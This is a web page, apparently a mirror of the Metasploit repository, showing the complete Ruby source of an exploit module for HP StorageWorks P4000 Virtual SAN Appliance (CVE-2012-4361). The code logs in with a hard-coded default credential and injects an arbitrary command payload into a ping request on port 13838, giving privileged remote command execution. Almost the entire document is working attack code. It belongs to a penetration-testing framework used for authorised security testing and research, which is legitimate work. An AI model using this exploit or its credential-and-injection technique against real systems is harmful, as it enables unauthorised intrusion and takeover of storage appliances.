Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/multi/misc/hp_vsa_exec.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::Tcp910def initialize(info={})11super(update_info(info,12'Name' => "HP StorageWorks P4000 Virtual SAN Appliance Command Execution",13'Description' => %q{14This module exploits a vulnerability found in HP's StorageWorks P4000 VSA on15versions prior to 9.5. By using a default account credential, it is possible16to inject arbitrary commands as part of a ping request via port 13838.17},18'License' => MSF_LICENSE,19'Author' =>20[21'Nicolas Gregoire', #Discovery, PoC, additional assistance22'sinn3r' #Metasploit module23],24'References' =>25[26['CVE', '2012-4361'],27['OSVDB', '82087'],28['EDB', '18893'],29['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?loc=en_US&id=958'],30['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03082086'],31['URL', 'http://www.agarri.fr/blog/archives/2012/02/index.html'] # Original Disclosure32],33'Payload' =>34{35'BadChars' => "/",36'Compat' =>37{38'PayloadType' => 'cmd',39'RequiredCmd' => 'generic perl telnet'40}41},42'DefaultOptions' =>43{44'EXITFUNC' => 'thread'45},46'Platform' => %w{ linux unix },47'Arch' => ARCH_CMD,48'Targets' =>49[50[ 'Automatic', {} ],51[ 'HP VSA up to 8.5', { 'Version' => '8.5.0' } ],52[ 'HP VSA 9', { 'Version' => '9.0.0' } ]53],54'Privileged' => true,55'DisclosureDate' => '2011-11-11',56'DefaultTarget' => 0))5758register_options(59[60OptPort.new('RPORT', [true, 'The remote port', 13838])61])62end636465def generate_packet(data)66pkt = "\x00\x00\x00\x00\x00\x00\x00\x01"67pkt << [data.length + 1].pack("N*")68pkt << "\x00\x00\x00\x00"69pkt << "\x00\x00\x00\x00\x00\x00\x00\x00"70pkt << "\x00\x00\x00\x14\xff\xff\xff\xff"71pkt << data72pkt << "\x00"7374pkt75end7677def get_target78if target.name !~ /Automatic/79return target80end8182# Login at 8.5.083packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"8.5.0\"")84print_status("#{rhost}:#{rport} Sending login packet for version 8.5.0")85sock.put(packet)86res = sock.get_once87vprint_status(Rex::Text.to_hex_dump(res)) if res88if res and res=~ /OK/ and res=~ /Login/89return targets[1]90end9192# Login at 9.0.093packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"9.0.0\"")94print_status("#{rhost}:#{rport} Sending login packet for version 9.0.0")95sock.put(packet)96res = sock.get_once97vprint_status(Rex::Text.to_hex_dump(res)) if res98if res and res=~ /OK/ and res =~ /Login/99return targets[2]100end101102fail_with(Failure::NoTarget, "#{rhost}:#{rport} - Target auto detection didn't work'")103end104105def exploit106connect107108if target.name =~ /Automatic/109my_target = get_target110print_good("#{rhost}:#{rport} - Target #{my_target.name} found")111else112my_target = target113print_status("#{rhost}:#{rport} Sending login packet")114packet = generate_packet("login:/global$agent/L0CAlu53R/Version \"#{my_target['Version']}\"")115sock.put(packet)116res = sock.get_once117vprint_status(Rex::Text.to_hex_dump(res)) if res118end119120# Command execution121print_status("#{rhost}:#{rport} Sending injection")122data = "get:/lhn/public/network/ping/127.0.0.1/foobar;#{payload.encoded}/"123data << "64/5/" if my_target.name =~ /9/124packet = generate_packet(data)125sock.put(packet)126res = sock.get_once127vprint_status(Rex::Text.to_hex_dump(res)) if res128129handler130disconnect131end132end133134135136